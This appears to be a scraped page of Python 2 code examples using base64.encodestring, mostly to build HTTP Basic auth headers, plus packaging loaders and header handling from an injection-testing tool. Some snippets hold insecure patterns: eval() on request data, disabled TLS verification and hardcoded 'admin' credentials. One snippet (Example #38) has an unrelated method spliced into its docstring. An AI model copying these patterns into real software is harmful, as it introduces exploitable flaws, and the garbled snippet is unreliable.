           Artifactory username. Optional parameter.
       password
           Artifactory password. Optional parameter.
       '''
    log.debug(
        "======================== MODULE FUNCTION: artifactory.get_latest_snapshot, artifactory_url=%s, repository=%s, group_id=%s, artifact_id=%s, packaging=%s, target_dir=%s, classifier=%s)",
        artifactory_url, repository, group_id, artifact_id, packaging,
        target_dir, classifier)

    headers = {}
    if username and password:
        headers['Authorization'] = 'Basic {0}'.format(
            base64.encodestring('{0}:{1}'.format(username,
                                                 password)).replace('\n', ''))
    artifact_metadata = _get_artifact_metadata(artifactory_url=artifactory_url,
                                               repository=repository,
                                               group_id=group_id,
                                               artifact_id=artifact_id,
                                               headers=headers)
    version = artifact_metadata['latest_version']
    snapshot_url, file_name = _get_snapshot_url(
        artifactory_url=artifactory_url,
        repository=repository,
        group_id=group_id,
        artifact_id=artifact_id,
        version=version,
        packaging=packaging,
        classifier=classifier,
        headers=headers)
    target_file = __resolve_target_file(file_name, target_dir, target_file)

    return __save_artifact(snapshot_url, target_file, headers)
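A hedged usage sketch of the function above; every value below is a placeholder rather than something taken from the snippet:

artifact_path = get_latest_snapshot(
    artifactory_url='http://artifactory.example.com/artifactory',
    repository='libs-snapshots',
    group_id='com.example',
    artifact_id='my-service',
    packaging='jar',
    target_dir='/tmp',
    username='reader',       # optional
    password='changeme')     # optional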
Example #35
def main():
    parser = argparse.ArgumentParser(description='UCM Script Options')
    parser.add_argument('-i', dest='host', help='Please specify UCM address.')
    parser.add_argument('-u', dest='user', help='Enter Username.')
    parser.add_argument('-p', dest='pwd', help='Enter Password.')
    parser.add_argument('-v',
                        dest='ver',
                        help='Enter Version. (10.0, 10.5, 11.0, 11.5)')
    parser.add_argument(
        '-a',
        dest='sso',
        help='SSO enabled "true" or "false" - "false is assumed"')
    parser.add_argument('-l', dest='log', help='Log file name.')
    parser.add_argument(
        '-s',
        dest='sOption',
        help='Script Option. Options include: partition, speeddial')
    options = parser.parse_args()
    global ip, user, pwd, client, axlver, wsdl
    if options.ver:
        axlver = options.ver
    else:
        axlver = raw_input(
            "Please Enter the version of the CUCM cluster (10.0, 10.5, 11.0, 11.5) > "
        )
    if options.host:
        ip = options.host
    else:
        ip = raw_input(
            "Please Enter the IP Address or Hostname of your CUCM > ")
    if options.user:
        user = options.user
    else:
        user = raw_input("Please Enter Your CUCM User ID > ")
    if options.pwd:
        pwd = options.pwd
    else:
        pwd = getpass("Please Enter Your Password > ")
    if options.sso:
        ssocheck = options.sso
    else:
        ssocheck = "false"
    if options.log:
        logfile = options.log + datetime.now().strftime(
            '%Y-%m-%d-%H%M%S') + '.log'
    else:
        logfile = 'lastlog' + datetime.now().strftime(
            '%Y-%m-%d-%H%M%S') + '.log'
    tns = 'http://schemas.cisco.com/ast/soap/'
    imp = Import('http://schemas.xmlsoap.org/soap/encoding/',
                 'http://schemas.xmlsoap.org/soap/encoding/')
    imp.filter.add(tns)
    location = 'https://' + ip + ':8443/axl/'
    wsdl = axltoolkit(axlver)
    if ssocheck == "true":
        base64string = base64.encodestring('%s:%s' % (user, pwd)).replace(
            '\n', '')
        authenticationHeader = {
            "SOAPAction": "ActionName",
            "Authorization": "Basic %s" % base64string
        }
        try:
            client = Client(wsdl,
                            location=location,
                            faults=False,
                            plugins=[ImportDoctor(imp)],
                            headers=authenticationHeader)
        except:
            print "Error with version or IP address of server. Please try again."
            sys.exit()
    else:
        try:
            client = Client(wsdl,
                            location=location,
                            faults=False,
                            plugins=[ImportDoctor(imp)],
                            username=user,
                            password=pwd)
        except:
            print "Error with version or IP address of server. Please try again."
            sys.exit()
    try:
        verresp = client.service.getCCMVersion()
    except:
        print('Unknown Error. Please try again.')
        sys.exit()
    if verresp[0] == 401:
        print('Authentication failure. Wrong username or password.')
        sys.exit()
    cucmver = verresp[1]['return'].componentVersion.version
    cucmsplitver = cucmver.split('.')
    cucmactualver = cucmsplitver[0] + '.' + cucmsplitver[1]
    print('This cluster is version ' + cucmver)
    if axlver != cucmactualver:
        print('You chose the wrong version. The correct version is ' +
              cucmactualver)
        sys.exit()
    scriptoptionnum = ""
    scriptoption = ""
    if options.sOption:
        scriptoption = options.sOption
    else:
        while scriptoptionnum == "":
            print(
                'Select an option by typing the number beside the selection.')
            print('1. Partition - Change the partition on a DN.')
            print('2. Speeddial - Add a speed dial to a phone.')
            scriptoptionnum = raw_input('> ')
    if scriptoptionnum == '1':
        partition(logfile)
        sys.exit()
    if scriptoptionnum == '2':
        speeddial(logfile)
        sys.exit()
    if scriptoption == 'partition':
        partition(logfile)
        sys.exit()
    if scriptoption == 'speeddial':
        speeddial(logfile)
        sys.exit()
    else:
        print('Please enter an option next time you run the script.')
        sys.exit()
Example #36
File: models.py  Project: wdmchaft/hue
 def get_encoded(self):
   return base64.encodestring(self.secret), base64.encodestring(self.guid)
Example #37
def do_check(request):

    # Check if defined any Host HTTP header.
    if menu.options.host and settings.HOST_INJECTION == None:
        request.add_header('Host', menu.options.host)

    # Check if defined any User-Agent HTTP header.
    if menu.options.agent:
        request.add_header('User-Agent', menu.options.agent)

    # Check if defined any Referer HTTP header.
    if menu.options.referer and settings.REFERER_INJECTION == None:
        request.add_header('Referer', menu.options.referer)

    # Check if defined any Cookie HTTP header.
    if menu.options.cookie and settings.COOKIE_INJECTION == False:
        request.add_header('Cookie', menu.options.cookie)

    # Check if defined any HTTP Authentication credentials.
    # HTTP Authentication: Basic / Digest Access Authentication.
    if not menu.options.ignore_401:
        if menu.options.auth_cred and menu.options.auth_type:
            try:
                settings.SUPPORTED_HTTP_AUTH_TYPES.index(
                    menu.options.auth_type)
                if menu.options.auth_type == "basic":
                    b64_string = base64.encodestring(
                        menu.options.auth_cred).replace('\n', '')
                    request.add_header("Authorization",
                                       "Basic " + b64_string + "")
                elif menu.options.auth_type == "digest":
                    try:
                        url = menu.options.url
                        try:
                            response = urllib2.urlopen(url)
                        except urllib2.HTTPError, e:
                            try:
                                authline = e.headers.get(
                                    'www-authenticate', '')
                                authobj = re.match('''(\w*)\s+realm=(.*),''',
                                                   authline).groups()
                                realm = authobj[1].split(',')[0].replace(
                                    "\"", "")
                                user_pass_pair = menu.options.auth_cred.split(
                                    ":")
                                username = user_pass_pair[0]
                                password = user_pass_pair[1]
                                authhandler = urllib2.HTTPDigestAuthHandler()
                                authhandler.add_password(
                                    realm, url, username, password)
                                opener = urllib2.build_opener(authhandler)
                                urllib2.install_opener(opener)
                                result = urllib2.urlopen(url)
                            except AttributeError:
                                pass
                    except urllib2.HTTPError, e:
                        pass
            except ValueError:
                err_msg = "Unsupported / Invalid HTTP authentication type '" + menu.options.auth_type + "'."
                err_msg += " Try basic or digest HTTP authentication type."
                print settings.print_critical_msg(err_msg)
                sys.exit(0)
        else:
            pass

    # The MIME media type for JSON.
    if settings.IS_JSON:
        request.add_header("Content-Type", "application/json")

    # Check if defined any extra HTTP headers.
    if menu.options.headers or menu.options.header:
        # Do replacement with the 'INJECT_HERE' tag, if the wildcard char is provided.
        if menu.options.headers:
            menu.options.headers = checks.wildcard_character(
                menu.options.headers)
            extra_headers = menu.options.headers
        else:
            menu.options.header = checks.wildcard_character(
                menu.options.header)
            extra_headers = menu.options.header

        extra_headers = extra_headers.replace(":", ": ")
        if ": //" in extra_headers:
            extra_headers = extra_headers.replace(": //", "://")

        if "\\n" in extra_headers:
            extra_headers = extra_headers.split("\\n")
            # Remove empty strings
            extra_headers = [x for x in extra_headers if x]
            if menu.options.header and not menu.options.headers and len(
                    extra_headers) > 1:
                warn_msg = "Swithing '--header' to '--headers' "
                warn_msg += "due to multiple extra HTTP headers."
                print settings.print_warning_msg(warn_msg)

        else:
            tmp_extra_header = []
            tmp_extra_header.append(extra_headers)
            extra_headers = tmp_extra_header

        for extra_header in extra_headers:
            # Extra HTTP Header name
            http_header_name = re.findall(r"(.*): ", extra_header)
            http_header_name = ''.join(http_header_name).strip()
            # Extra HTTP Header value
            http_header_value = re.findall(r":(.*)", extra_header)
            http_header_value = ''.join(http_header_value).strip()
            # Check if it is a custom header injection.
            if settings.CUSTOM_HEADER_INJECTION == False and \
               settings.INJECT_TAG in http_header_value:
                settings.CUSTOM_HEADER_INJECTION = True
                settings.CUSTOM_HEADER_NAME = http_header_name
            request.add_header(http_header_name, http_header_value)
Example #38
    def _send_to_plex(self, command, host, username=None, password=None):
        """Handles communication to Plex hosts via HTTP API
            
    def notify_subtitle_download(self, ep_name, lang):
        if sickbeard.PLEX_NOTIFY_ONSUBTITLEDOWNLOAD:
            self._notifyXBMC(ep_name + ": " + lang, common.notifyStrings[common.NOTIFY_SUBTITLE_DOWNLOAD])

        Args:
            command: Dictionary of field/data pairs, encoded via urllib and passed to the legacy xbmcCmds HTTP API
            host: Plex host:port
            username: Plex API username
            password: Plex API password

        Returns:
            Returns 'OK' for successful commands or False if there was an error

        """

        # fill in omitted parameters
        if not username:
            username = sickbeard.PLEX_USERNAME
        if not password:
            password = sickbeard.PLEX_PASSWORD

        if not host:
            logger.log(u"No Plex host specified, check your settings",
                       logger.DEBUG)
            return False

        for key in command:
            if type(command[key]) == unicode:
                command[key] = command[key].encode('utf-8')

        enc_command = urllib.urlencode(command)
        logger.log(u"Plex encoded API command: " + enc_command, logger.DEBUG)

        url = 'http://%s/xbmcCmds/xbmcHttp/?%s' % (host, enc_command)
        try:
            req = urllib2.Request(url)
            # if we have a password, use authentication
            if password:
                base64string = base64.encodestring('%s:%s' %
                                                   (username, password))[:-1]
                authheader = "Basic %s" % base64string
                req.add_header("Authorization", authheader)
                logger.log(
                    u"Contacting Plex (with auth header) via url: " + url,
                    logger.DEBUG)
            else:
                logger.log(u"Contacting Plex via url: " + url, logger.DEBUG)

            response = urllib2.urlopen(req)

            result = response.read().decode(sickbeard.SYS_ENCODING)
            response.close()

            logger.log(u"Plex HTTP response: " + result.replace('\n', ''),
                       logger.DEBUG)
            # could return result response = re.compile('<html><li>(.+\w)</html>').findall(result)
            return 'OK'

        except (urllib2.URLError, IOError), e:
            logger.log(
                u"Warning: Couldn't contact Plex at " +
                fixStupidEncodings(url) + " " + ex(e), logger.WARNING)
            return False
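A hypothetical call into the helper above, from within the same notifier class; the command fields, host and log message are illustrative only:

command = {'command': 'ExecBuiltIn',
           'parameter': 'Notification(SickBeard,Download finished)'}
if self._send_to_plex(command, '192.168.1.10:32400',
                      username='plexuser', password='plexpass') == 'OK':
    logger.log(u"Plex notification sent", logger.DEBUG)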
Example #39
def b64encode(s):
    return str(b64.encodestring(s), 'ascii')
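Worth noting: base64.encodestring was removed in Python 3.9, so a wrapper like the one above eventually needs the newer name. A small compatibility shim (the function name and the caller's environment are assumptions, not part of the snippet):

import base64

def b64encode_compat(data):
    # prefer the Python 3 name, fall back to the legacy alias on old interpreters
    encode = getattr(base64, 'encodebytes', None) or base64.encodestring
    return encode(data).decode('ascii')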

Example #40
  def collect_metrics(self, service, base_url, params=None):
    """Return JSON metrics from the given server."""
    info = urlparse.urlsplit(base_url)
    host = info.hostname
    port = info.port or 80
    netloc = host

    if info.port:
      netloc += ':{0}'.format(info.port)
    base_url = '{scheme}://{netloc}{path}'.format(
        scheme=info.scheme, netloc=netloc, path=info.path)

    authorization = None
    if info.username or info.password:
      authorization = base64.encodestring(
          '%s:%s' % (info.username, info.password)).replace('\n', '')

    query = '?' + info.query if info.query else ''
    sep = '&' if info.query else '?'
    query_params = dict(self.__default_scan_params)
    if params is None:
      params = {}
    keys_to_copy = [key
                    for key in ['tagNameRegex', 'tagValueRegex',
                                'meterNameRegex']
                    if key in params]
    for key in keys_to_copy:
      query_params[key] = params[key]

    for key, value in query_params.items():
      query += sep + key + "=" + urllib2.quote(value)
      sep = "&"

    url = '{base_url}{query}'.format(base_url=base_url, query=query)
    response = urllib2.urlopen(self.create_request(url, authorization))

    json_text = response.read()
    try:
      spectator_response = json.JSONDecoder(encoding='utf-8').decode(json_text)
    except ValueError:
      if len(json_text) > 200:
        snippet = '%s ... %s' % (json_text[:100], json_text[-100:])
      else:
        snippet = json_text
      logging.error('Invalid JSON len=%d excerpt:\n%s', len(json_text), snippet)
      raise

    try:
      self.__log_scan_diff(host, port + 1012,
                           spectator_response.get('metrics', {}))
    except:
      extype, exvalue, _ = sys.exc_info()
      logging.error(traceback.format_exception_only(extype, exvalue))

    spectator_response['__port'] = port
    spectator_response['__host'] = (
        socket.getfqdn()
        if host in ['localhost', '127.0.0.1', None, '']
        else host)

    if str(params.get('disable_metric_filter', False)).lower() == 'true':
      filtered_metrics = spectator_response['metrics']
    else:
      filtered_metrics = self.filter_response(
          service, base_url, spectator_response)

    # NOTE: 20180614
    # There have been occasional bugs in spinnaker
    # where gauges are returned as 'NaN'.
    #
    # This string value is causing prometheus errors
    # which prevent any metrics from being stored.
    num_metrics = 0
    for metric_name, metric_data in filtered_metrics.items():
      meter_values = metric_data.get('values', [])
      num_metrics += len(meter_values)
      empty_value_list_indexes = []
      for index, values_list in enumerate(meter_values):
        # Ensure the value of each measurement is a float
        # If jackson encountered NaN or Inf values then
        # it will make them strings by default.
        # These should probably not be present, but if they are
        # This will convert NaN or Inf into a float
        for elem in values_list['values']:
          if elem['v'] == 'NaN':
            logging.warn('Removing illegal NaN from "%s.%s"',
                         service, metric_name)
            values_list['values'] = [e for e in values_list['values']
                                     if e['v'] != 'NaN']
            if not values_list['values']:
              empty_value_list_indexes.append(index)
            break

      # If there are metrics that only had NaN values,
      # delete them in reverse order so list indexes are still valid.
      # This could still leave meters with no metrics.
      while empty_value_list_indexes:
        del meter_values[empty_value_list_indexes.pop()]

    spectator_response['metrics'] = filtered_metrics
    return spectator_response
Example #41
def make_vidispine_request(agent,
                           method,
                           urlpath,
                           body,
                           headers,
                           content_type='application/xml'):
    import base64
    from pprint import pprint
    from vsexception import VSException
    auth = base64.encodestring(
        '%s:%s' %
        (settings.VIDISPINE_USERNAME, settings.VIDISPINE_PASSWORD)).replace(
            '\n', '')

    headers['Authorization'] = "Basic %s" % auth
    headers['Content-Type'] = content_type
    #conn.request(method,url,body,headers)
    if not re.match(r'^/', urlpath):
        urlpath = '/' + urlpath

    url = "{0}:{1}{2}".format(settings.VIDISPINE_URL, settings.VIDISPINE_PORT,
                              urlpath)
    print("URL is %s" % url)
    print(body)
    (headers, content) = agent.request(url,
                                       method=method,
                                       body=body,
                                       headers=headers)
    print(content)
    pprint(headers)
    if int(headers['status']) < 200 or int(headers['status']) > 299:
        try:
            from raven import Client as RavenClient

            if not 'dsn' in settings.RAVEN_CONFIG:
                logger.error(
                    "RAVEN_CONFIG specified but does not specify DSN. Consult Raven documentation for how to set it up properly"
                )
                return

            c = RavenClient(settings.RAVEN_CONFIG['dsn'])

            c.user_context({
                'method': method,
                'url': url,
                'body': body,
                'headers': headers,
                'content_type': content_type,
                'content': content,
            })
            try:
                e = VSException()
                #try:
                e.fromJSON(content)
                print(content)
                #except StandardError: #if we did not get valid XML
                #    raise HttpError("Vidispine error: %s" % headers['status'])
            except HttpError:
                c.captureException()
                c.context.clear()
                raise
            except VSException:
                c.captureException()
                c.context.clear()
                raise

        except ImportError:
            logger.warning(
                "No Raven installation detected. Sentry will not be notified.")
            return

    return (headers, content)
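A rough usage sketch; the agent and endpoint below are placeholders, since the snippet does not show its real call sites:

import httplib2

agent = httplib2.Http()
headers, content = make_vidispine_request(agent, 'GET', '/API/version', None, {},
                                          content_type='application/xml')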
Example #42
 def create_security_group(self, name, description):
     return self.__make_request__(
         'CreateSecurityGroup', {
             'GroupName': name,
             'GroupDescription': base64.encodestring(description)
         })
Example #43
    def sources(self, url, hostDict, hostprDict):
        try:
            sources = []

            if url == None: return sources

            data = urlparse.parse_qs(url)
            data = dict([(i, data[i][0]) if data[i] else (i, '')
                         for i in data])
            title = data['tvshowtitle'] if 'tvshowtitle' in data else data[
                'title']
            imdb = data['imdb']
            aliases = eval(data['aliases'])
            headers = {}

            if 'tvshowtitle' in data:
                url = self.searchShow(title, int(data['season']),
                                      int(data['episode']), aliases, headers)
            else:
                url = self.searchMovie(title, data['year'], aliases, headers)

            r = client.request(url,
                               headers=headers,
                               output='extended',
                               timeout='10')

            if not imdb in r[0]: raise Exception()

            cookie = r[4]
            headers = r[3]
            result = r[0]

            try:
                r = re.findall('(https:.*?redirector.*?)[\'\"]', result)
                for i in r:
                    try:
                        sources.append({
                            'source':
                            'gvideo',
                            'quality':
                            directstream.googletag(i)[0]['quality'],
                            'language':
                            'en',
                            'url':
                            i,
                            'direct':
                            True,
                            'debridonly':
                            False
                        })
                    except:
                        pass
            except:
                pass

            try:
                auth = re.findall('__utmx=(.+)', cookie)[0].split(';')[0]
            except:
                auth = 'false'
            auth = 'Bearer %s' % urllib.unquote_plus(auth)
            headers[
                'User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'
            headers['Authorization'] = auth
            headers[
                'Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
            headers[
                'Accept'] = 'application/json, text/javascript, */*; q=0.01'
            headers['Accept-Encoding'] = 'gzip,deflate,br'
            headers['Referer'] = url

            u = '/ajax/tnembedr.php'
            self.base_link = client.request(self.base_link,
                                            headers=headers,
                                            output='geturl')
            u = urlparse.urljoin(self.base_link, u)

            action = 'getEpisodeEmb' if '/episode/' in url else 'getMovieEmb'

            elid = urllib.quote(
                base64.encodestring(str(int(time.time()))).strip())

            token = re.findall("var\s+tok\s*=\s*'([^']+)", result)[0]

            idEl = re.findall('elid\s*=\s*"([^"]+)', result)[0]

            post = {
                'action': action,
                'idEl': idEl,
                'token': token,
                'elid': elid
            }
            post = urllib.urlencode(post)
            cookie += ';%s=%s' % (idEl, elid)
            headers['Cookie'] = cookie

            r = client.request(u,
                               post=post,
                               headers=headers,
                               cookie=cookie,
                               XHR=True)
            r = str(json.loads(r))
            r = re.findall('\'(http.+?)\'', r) + re.findall('\"(http.+?)\"', r)

            for i in r:
                #try: sources.append({'source': 'gvideo', 'quality': directstream.googletag(i)[0]['quality'], 'language': 'en', 'url': i, 'direct': True, 'debridonly': False})
                #except: pass
                if 'googleusercontent' in i or 'blogspot' in i:
                    try:
                        newheaders = {
                            'User-Agent':
                            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
                            'Accept': '*/*',
                            'Host': 'lh3.googleusercontent.com',
                            'Accept-Language':
                            'en-US,en;q=0.8,de;q=0.6,es;q=0.4',
                            'Accept-Encoding': 'identity;q=1, *;q=0',
                            'Referer': url,
                            'Connection': 'Keep-Alive',
                            'X-Client-Data':
                            'CJK2yQEIo7bJAQjEtskBCPqcygEIqZ3KAQjSncoBCKijygE=',
                            'Range': 'bytes=0-'
                        }
                        resp = client.request(i,
                                              headers=newheaders,
                                              redirect=False,
                                              output='extended',
                                              timeout='10')
                        loc = resp[2]['Location']
                        c = resp[2]['Set-Cookie'].split(';')[0]
                        i = '%s|Cookie=%s' % (loc, c)
                        urls, host, direct = [{
                            'quality': 'SD',
                            'url': i
                        }], 'gvideo', True

                    except:
                        pass

                try:
                    #direct = False
                    quali = 'SD'
                    quali = source_utils.check_sd_url(i)
                    if 'googleapis' in i:
                        sources.append({
                            'source': 'gvideo',
                            'quality': quali,
                            'language': 'en',
                            'url': i,
                            'direct': True,
                            'debridonly': False
                        })
                        continue
                    valid, hoster = source_utils.is_host_valid(i, hostDict)
                    if not urls or urls == []:
                        urls, host, direct = source_utils.check_directstreams(
                            i, hoster)
                    if valid:
                        for x in urls:
                            if host == 'gvideo':
                                try:
                                    x['quality'] = directstream.googletag(
                                        x['url'])[0]['quality']
                                except:
                                    pass

                            sources.append({
                                'source': host,
                                'quality': x['quality'],
                                'language': 'en',
                                'url': x['url'],
                                'direct': direct,
                                'debridonly': False
                            })
                    else:
                        sources.append({
                            'source': 'CDN',
                            'quality': quali,
                            'language': 'en',
                            'url': i,
                            'direct': True,
                            'debridonly': False
                        })
                except:
                    pass

            return sources
        except:
            return sources
Example #44
from controllers.api.single_match import *
import base64
import urllib2

username = "******"
password = "******"
base64string = base64.encodestring('%s:%s' % (username, password)).replace(
    '\n', '')


#Example json to post: {"selection": {"home_ft": [1,4],  "btts_ft":-1}, "iD": "2522816"}
#curl -vX POST http://127.0.0.1:8080/api/single_match/pricev2 -d "{\"selection\": {\"winners_criteria\": 1 , \"home_ft\": [1,4],  \"btts_ft\":-1}, \"iD\": \"2522816\"}" --header "Content-Type: application/json"
class PricerHandler(webapp2.RequestHandler):
    @parse_json_body
    @add_cors_headers
    @emit_json
    def post(self, bet):
        print json_dumps(bet)
        url = 'http://pricer-dot-exotic-parameter-predictions.appspot.com/price_gamev2'
        req = urllib2.Request(url)
        req.add_header("Authorization", "Basic %s" % base64string)
        req.add_header('Content-Type', 'application/json')
        resp = urllib2.urlopen(req, json.dumps(bet))
        return resp.read()


Routing = [('/api/single_match/pricev2', PricerHandler)]
app = webapp2.WSGIApplication(Routing)

Example #45
def squeeze(app, start, filelist):
    localMagic = MAGIC
    data = None

    bootstrap = app + ".py"
    archive   = app + ".pyz"

    archiveid = app

    #
    # avoid overwriting files not generated by squeeze

    try:
        fp = open(bootstrap)
        s = fp.readline()
        string.index(s, MAGIC)
    except IOError:
        pass
    except ValueError:
        print(bootstrap, "was not created by squeeze.  You have to manually")
        print("remove the file to proceed.")
        sys.exit(1)

    #
    # collect modules

    sq = Squeezer(archiveid)
    for file, moduleName in filelist:
        # print 'addmodule:', file, moduleName
        sq.addmodule(file, moduleName)

    package = sq.getarchive()
    size = len(package)

    #
    # get loader

    loader = getloader(data, package)

    zbegin, zend = "zlib.decompress(", ")"
    loader = zlib.compress(loader, 9)

    loaderlen = len(loader)

    magic = repr(imp.get_magic())
    version = string.split(sys.version)[0]

    #
    # generate script and package files

    if embed:

        # embedded archive
        data = base64.encodestring(loader + package)

        fp = open(bootstrap, "w")
        fp.write('''\
#%(localMagic)s %(archiveid)s
import ihooks,zlib,base64,marshal
s=base64.decodestring("""
%(data)s""")
exec marshal.loads(%(zbegin)ss[:%(loaderlen)d]%(zend)s)
boot("%(app)s",s,%(size)d,%(loaderlen)d)
exec "import %(start)s"
''' % locals())
        bytes = fp.tell()

    else:

        # separate archive file

        fp = open(archive, "wb")

        fp.write(loader)
        fp.write(package)

        bytes = fp.tell()
        fp.close()
        #
        # create bootstrap code

        fp = open(bootstrap, "w")
        fp.write("""\
#%(localMagic)s %(archiveid)s
import ihooks,zlib,marshal
f=open("%(archive)s","rb")
exec marshal.loads(%(zbegin)sf.read(%(loaderlen)d)%(zend)s)
boot("%(app)s",f,%(size)d)
exec "import %(start)s"
""" % locals())
        bytes = bytes + fp.tell()
        fp.close()

    #
    # show statistics

    dummy, rawbytes = sq.getstatus()

    print("squeezed", rawbytes, "to", bytes, "bytes", end=' ')
    print("(%d%%)" % (bytes * 100 / rawbytes))
Example #46
 def set_auth_headers(self, params):
     if not self.credentials:
         return
     credentials = base64.encodestring('%s:%s' % self.credentials).strip()
     params['HTTP_AUTHORIZATION'] = 'Basic %s' % credentials
     return params
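The same header can also be built standalone; a short sketch with made-up credentials (Python 2, matching the snippet):

import base64

credentials = base64.encodestring('%s:%s' % ('admin', 'secret')).strip()
params = {'HTTP_AUTHORIZATION': 'Basic %s' % credentials}
# params['HTTP_AUTHORIZATION'] == 'Basic YWRtaW46c2VjcmV0'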
Example #47
#!/bin/env python2.7

import httplib2
import json, base64
import json

http = httplib2.Http(".cache")
base64string = base64.encodestring('%s:%s' % ('admin', 'admin'))[:-1]
authheader = "Basic %s" % base64string
jsonHeader = {
    'Content-Type': 'application/json',
    "Accept": "application/json",
    'shopcode': "111",
    "Authorization": authheader
}
method = 'POST'

url = 'http://192.168.6.199:28080/aifexchange/loaddicts?abc=321'

k = 10
dictionary = []
for i in range(k):
    command = {
        "command": "addInventItem",
        "invent": {
            "deptCode": 1,
            "measureCode": "796",
            "minPrice": 0,
            "inventcode": "0000000007%s" % i,
            "isInventItem": True,
            "price": 130 + i,
Example #48
        'pass': '******'
    }
}

if no_cert_warnings:
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

for cluster in rubrik_clusters:
    # get our cluster name first
    url = ('https://' + rubrik_clusters[cluster]['ip'] + '/api/v1/cluster/me')
    # create headers
    headers = {}
    auth = '{0}:{1}'.format(rubrik_clusters[cluster]['user'],
                            rubrik_clusters[cluster]['pass'])
    auth = base64.encodestring(auth).replace('\n', '')
    headers['Authorization'] = 'Basic {0}'.format(auth)
    parameters = {}
    response = requests.get(url,
                            params=parameters,
                            headers=headers,
                            verify=False)
    response = response.json()
    cluster_name = response['name']
    # done with getting cluster name
    url = ('https://' + rubrik_clusters[cluster]['ip'] +
           '/api/internal/cluster/me/io_stats?range=-10min')
    # create headers
    headers = {}
    auth = '{0}:{1}'.format(rubrik_clusters[cluster]['user'],
                            rubrik_clusters[cluster]['pass'])
Example #49
 def base64_string(self):
     return base64.encodestring(self.svg.to_string().encode()).replace(b'\n', b'')
Example #50
    def to_string(self):
        """
        :return: An xml node (as a string) representing the HTTP request / response.

        <http-transaction id="...">
            <http-request>
                <status></status>
                <headers>
                    <header>
                        <field></field>
                        <content></content>
                    </header>
                </headers>
                <body content-encoding="base64"></body>
            </http-request>

            <http-response>
                <status></status>
                <headers>
                    <header>
                        <field></field>
                        <content></content>
                    </header>
                </headers>
                <body content-encoding="base64"></body>
            </http-response>
        </http-transaction>

        One of the differences this class has with the previous implementation is
        that the body is always encoded, no matter the content-type. This helps
        prevent encoding issues.
        """
        # Get the data from the cache
        node = self.get_node_from_cache()
        if node is not None:
            return node

        # HistoryItem to get requests/responses
        req_history = HistoryItem()

        # This might raise a DBException in some cases (which I still
        # need to identify and fix). When an exception is raised here
        # the caller needs to handle it by ignoring this part of the
        # HTTP transaction
        request, response = req_history.load_from_file(self._id)

        data = request.get_data() or ''
        b64_encoded_request_body = base64.encodestring(smart_str_ignore(data))

        body = response.get_body() or ''
        b64_encoded_response_body = base64.encodestring(smart_str_ignore(body))

        context = {
            'id': self._id,
            'request': {
                'status': request.get_request_line().strip(),
                'headers': request.get_headers(),
                'body': b64_encoded_request_body
            },
            'response': {
                'status': response.get_status_line().strip(),
                'headers': response.get_headers(),
                'body': b64_encoded_response_body
            }
        }

        context = dotdict(context)

        template = self.get_template(self.TEMPLATE)
        transaction = template.render(context)
        self.save_node_to_cache(transaction)

        return transaction
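Because every body is base64-encoded regardless of content type, any consumer of this XML has to decode it again. A minimal sketch (element names taken from the docstring above; the helper function itself is an assumption, not part of the class):

import base64
import xml.etree.ElementTree as ET

def response_body_from_transaction(xml_string):
    # Parse the <http-transaction> document and undo the base64 encoding
    # of the response body.
    root = ET.fromstring(xml_string)
    body_node = root.find('./http-response/body')
    return base64.b64decode(body_node.text or '')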
Example #51
0


import os, sys, shutil, base64, getpass, json
import re
import urllib2
from distutils.version import StrictVersion
from distutils.dir_util import copy_tree


connect_user = raw_input("Please enter a connect account user: ")
connect_password = getpass.getpass("Please enter the connect password: ")

request = urllib2.Request("https://connect.nuxeo.com/nuxeo/site/target-platforms?filterDisabled=true&filterRestricted=true&filterDeprecated=true")
base64string = base64.encodestring('%s:%s' % (connect_user, connect_password)).replace('\n', '')
request.add_header("Authorization", "Basic %s" % base64string)
target_platforms_json = urllib2.urlopen(request).read()
target_platforms = json.loads(target_platforms_json)

# Specific case for SNAPSHOT release
master = {}
master['version'] = "master"
master['downloadLink'] = "http://community.nuxeo.com/static/latest-snapshot/nuxeo-server-tomcat,SNAPSHOT.zip"
target_platforms.append(master)


MIN_VERSION='7.10'
VARIANTS = ['ubuntu', 'centos', 'rhel']

travis = []
Example #52
0
def get_sign_string(source, secret):

    h = hmac.new(secret.encode('utf-8'), source.encode('utf-8'), hashlib.sha1)
    signature = base64.encodestring(h.digest()).strip()
    return signature
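The function above relies on hmac, hashlib and base64 being imported in the original module; a usage sketch with those imports spelled out (the source string and secret are made-up values, and get_sign_string is assumed to be in scope as defined above):

import base64
import hashlib
import hmac

signature = get_sign_string('GET&%2F&SignatureVersion%3D1.0', 'testsecret&')
print(signature)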
Example #53
0
    def _writePilotScript(self, workingDirectory, pilotOptions, proxy,
                          httpProxy, pilotExecDir):
        """
     Prepare the script to execute the pilot
     For the moment it will do like Grid Pilots, a full DIRAC installation

     It assumes that the pilot script will have access to the submit working directory
    """
        try:
            compressedAndEncodedProxy = base64.encodestring(
                bz2.compress(proxy.dumpAllToString()['Value'])).replace(
                    '\n', '')
            compressedAndEncodedPilot = base64.encodestring(
                bz2.compress(open(self.pilot, "rb").read(),
                             9)).replace('\n', '')
            compressedAndEncodedInstall = base64.encodestring(
                bz2.compress(open(self.install, "rb").read(),
                             9)).replace('\n', '')
        except:
            self.log.exception(
                'Exception during file compression of proxy, dirac-pilot or dirac-install'
            )
            return S_ERROR(
                'Exception during file compression of proxy, dirac-pilot or dirac-install'
            )

        localPilot = """#!/bin/bash
/usr/bin/env python << EOF
#
import os, tempfile, sys, shutil, base64, bz2
try:
  pilotExecDir = '%(pilotExecDir)s'
  if not pilotExecDir:
    pilotExecDir = None
  pilotWorkingDirectory = tempfile.mkdtemp( suffix = 'pilot', prefix = 'DIRAC_', dir = pilotExecDir )
  os.chdir( pilotWorkingDirectory )
  open( 'proxy', "w" ).write(bz2.decompress( base64.decodestring( "%(compressedAndEncodedProxy)s" ) ) )
  open( '%(pilotScript)s', "w" ).write(bz2.decompress( base64.decodestring( "%(compressedAndEncodedPilot)s" ) ) )
  open( '%(installScript)s', "w" ).write(bz2.decompress( base64.decodestring( "%(compressedAndEncodedInstall)s" ) ) )
  os.chmod("proxy",0600)
  os.chmod("%(pilotScript)s",0700)
  os.chmod("%(installScript)s",0700)
